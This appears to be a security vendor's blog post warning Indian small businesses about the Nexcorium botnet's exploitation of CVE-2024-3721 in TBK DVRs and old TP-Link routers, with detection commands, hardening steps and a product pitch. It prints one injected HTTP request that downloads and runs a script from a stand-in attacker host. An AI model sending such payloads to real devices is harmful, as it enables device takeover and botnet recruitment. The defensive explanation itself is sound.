Nexcorium Botnet: How Indian SMBs Can Protect DVRs and Routers

What Happened

In April 2026, security researchers at Fortinet FortiGuard Labs and Palo Alto Networks Unit 42 uncovered a coordinated campaign exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR devices. Threat actors deployed a Mirai botnet variant called Nexcorium across thousands of compromised devices, turning them into DDoS weapons targeting critical infrastructure and commercial services.

The attack wasn't limited to DVRs. Researchers also documented exploitation of end-of-life (EoL) TP-Link Wi-Fi routers—devices that no longer receive security patches from the manufacturer. These routers, commonly found in small offices and retail shops across India, became entry points for botnet deployment. Once infected, these devices silently participated in distributed denial-of-service (DDoS) attacks without the owner's knowledge.

What makes Nexcorium particularly dangerous is its ability to persist across device reboots and evade basic network monitoring. The botnet communicates with command-and-control (C2) servers using encrypted channels, making detection difficult for SMBs without advanced security infrastructure.

Why This Matters for Indian Businesses

This threat hits a critical blind spot: most small businesses treat network infrastructure as "set and forget." A DVR installed three years ago? Still running. A router from 2019? Still managing guest Wi-Fi. These devices are invisible until they become weapons.

Under India's Digital Personal Data Protection (DPDP) Act, organizations are responsible for securing data in transit and at rest. If your compromised DVR or router is used in a DDoS attack that damages a third party's systems, you could face liability. More critically, if that DDoS attack disrupts a financial institution or telecom provider, CERT-In's 6-hour incident reporting mandate kicks in—and you'll need to prove you took reasonable steps to prevent it.

The Reserve Bank of India (RBI) also requires financial institutions to audit third-party vendors and connected devices. If your business processes payments or handles customer data, a compromised router becomes a compliance violation.

Here's the real risk: Your business doesn't need to be the target. Your devices just need to be the weapon. Nexcorium doesn't steal data from the DVR—it uses the DVR's bandwidth and processing power to attack someone else. You're liable, your network is blacklisted, and your legitimate traffic gets filtered by ISPs trying to stop the DDoS.

Technical Breakdown

How the Attack Works

CVE-2024-3721 is a command injection vulnerability in TBK DVR's web interface. The vulnerability exists in how the device parses user input in the device configuration endpoint. An attacker doesn't need credentials—they can send a specially crafted HTTP request that executes arbitrary shell commands.

graph TD
    A[Attacker Scans for Exposed TBK DVRs] -->|Port 80/8080| B[Sends Malicious HTTP Request]
    B -->|CVE-2024-3721 Payload| C[Command Injection Executed]
    C -->|Shell Access| D[Downloads Nexcorium Binary]
    D -->|Persistence| E[Modifies Firmware/Cron Jobs]
    E -->|Network Compromise| F[Device Joins DDoS Botnet]
    F -->|Encrypted C2| G[Receives Attack Instructions]
    G -->|Bandwidth Hijack| H[Launches DDoS on Target]

    style A fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style B fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style C fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style D fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
    style E fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style F fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style G fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
    style H fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0

Here's what the actual exploit payload looks like (simplified):

GET /api/device/config?name=system;wget%20http://attacker.com/nexcorium.sh;sh%20nexcorium.sh HTTP/1.1
Host: 192.168.1.100:8080
Connection: close

The semicolon breaks out of the intended command, and the attacker's shell script downloads and executes the Nexcorium binary. The script typically:

1. Disables firewall rules to hide network traffic
2. Installs a rootkit to survive reboots
3. Connects to C2 servers using hardcoded IP addresses and DNS names
4. Begins DDoS operations immediately, joining a botnet pool

Why Detection is Hard

Nexcorium uses several evasion techniques:

1. Encrypted C2 communication: Traffic doesn't match known DDoS patterns
2. Polymorphic payload: The binary changes on each infection, evading signature-based detection
3. Low-bandwidth attacks: Spreads DDoS load across thousands of devices to avoid triggering rate-limit alarms
4. Process hiding: Uses kernel-level rootkits to hide from ps and netstat commands

How to Protect Your Business

Immediate Actions (This Week)

Quick Fix: Check for Nexcorium Infection

Run this command on your network to identify suspicious outbound connections from your DVRs and routers:

# Check for unusual outbound connections from IoT devices
arp-scan -l | grep -i "TBK\|TP-Link" | awk '{print $1}' | while read ip; do
  echo "Scanning $ip for suspicious connections..."
  ssh admin@$ip "netstat -an | grep ESTABLISHED | grep -v ':22\|:80\|:443'" 2>/dev/null
done

If you see connections to unfamiliar IP addresses (especially non-standard ports like 6379, 5555, or 9999), the device may be compromised.

For a more thorough check, monitor DNS queries:

# Capture DNS requests from your DVR subnet
sudo tcpdump -i eth0 -n 'src net 192.168.1.0/24 and dst port 53' -w dvr_dns.pcap

# Extract unique domains
tshark -r dvr_dns.pcap -Y dns -T fields -e dns.qry.name | sort | uniq

If you see domains like c2.nexcorium.ru or similar, your device is likely compromised.

Long-Term Hardening

1. Disable Remote Management: Turn off port forwarding and remote access features on DVRs and routers. Access them only from your internal network.

1. Implement Network Segmentation: Place all IoT devices on a restricted VLAN that can't communicate with your main business network.

1. Deploy Intrusion Detection: Use open-source tools like Suricata or Zeek to detect botnet C2 communication patterns.

1. Enable Device Logging: Configure syslog forwarding from all network devices to a central logging server. Monitor for suspicious login attempts and configuration changes.

1. Establish Replacement Schedules: Retire devices after 4 years, even if they "still work." Security patches stop long before hardware fails.

How Bachao.AI Detects This

Bachao.AI by Dhisattva AI Pvt Ltd embeds enterprise-grade detection into an accessible VAPT platform for Indian SMBs — built around three principles: visibility, baseline behaviour, and anomaly response.

Our VAPT Scan includes:

1. Network device enumeration and vulnerability mapping
2. Identification of EoL devices and missing patches
3. Botnet signature detection and C2 communication analysis
4. Compliance gap assessment under DPDP Act and RBI guidelines

Vulnerability Report Summary
─────────────────────────────
[CRITICAL] TBK DVR Model XYZ running firmware v2.1.4 (EoL)
  → CVE-2024-3721 (CVSS 6.3) - Command Injection
  → No patches available from vendor
  → Recommendation: Replace device or air-gap from network

[HIGH] TP-Link Router WR841N running firmware v1.8.2 (2019)
  → Multiple RCE vulnerabilities in CGI interface
  → Device is EoL; no vendor support
  → Recommendation: Immediate replacement

[MEDIUM] Port 8080 exposed on DVR to internet
  → Attacker can reach vulnerable web interface
  → Recommendation: Block port 8080 at firewall; use VPN for remote access

[MEDIUM] No network segmentation detected
  → DVR is on same subnet as accounting workstations
  → Lateral movement risk is high
  → Recommendation: Create IoT VLAN with restricted egress rules

Frequently Asked Questions

Q: How do I know if my DVR model is vulnerable to CVE-2024-3721?

CVE-2024-3721 affects TBK DVR devices running firmware versions prior to the patch released in late 2024. Check your firmware version via the device web interface under Settings → System → Firmware. If you cannot find a patch on the TBK support page, treat the device as vulnerable.

Q: Can I patch the vulnerability without replacing the device?

If TBK has released a firmware update for your model, apply it immediately. If the device is end-of-life with no available patch, network segmentation (isolating it to a restricted VLAN with outbound filtering) is the next best control until replacement.

Q: Does CERT-In need to be notified if my DVR is used in a DDoS attack?

Yes, under CERT-In's April 2022 directions, compromise of network infrastructure that results in a DDoS attack or data breach must be reported within 6 hours of discovery.

Q: What ports should I block to prevent Nexcorium C2 communication?

Common C2 ports observed in Mirai-variant campaigns include 6379, 5555, 9999, and 23. Block outbound connections from IoT VLANs to all non-whitelisted ports and IPs.

Q: We're a small retailer with one DVR for CCTV. Do these rules apply to us?

Yes. Size is irrelevant to CERT-In and DPDP Act obligations. If your device is compromised and used to attack a third party, you carry liability. A single VLAN separation and credential change takes under an hour.

Protect your business with Bachao.AI — India's automated vulnerability assessment and penetration testing platform. Get a comprehensive security scan of your web applications and infrastructure. Visit Bachao.AI to get started.

Originally reported by The Hacker News

Written by Shouvik Mukherjee, Founder, Bachao.AI (Dhisattva AI Pvt Ltd). Follow on LinkedIn for daily cybersecurity insights for Indian businesses.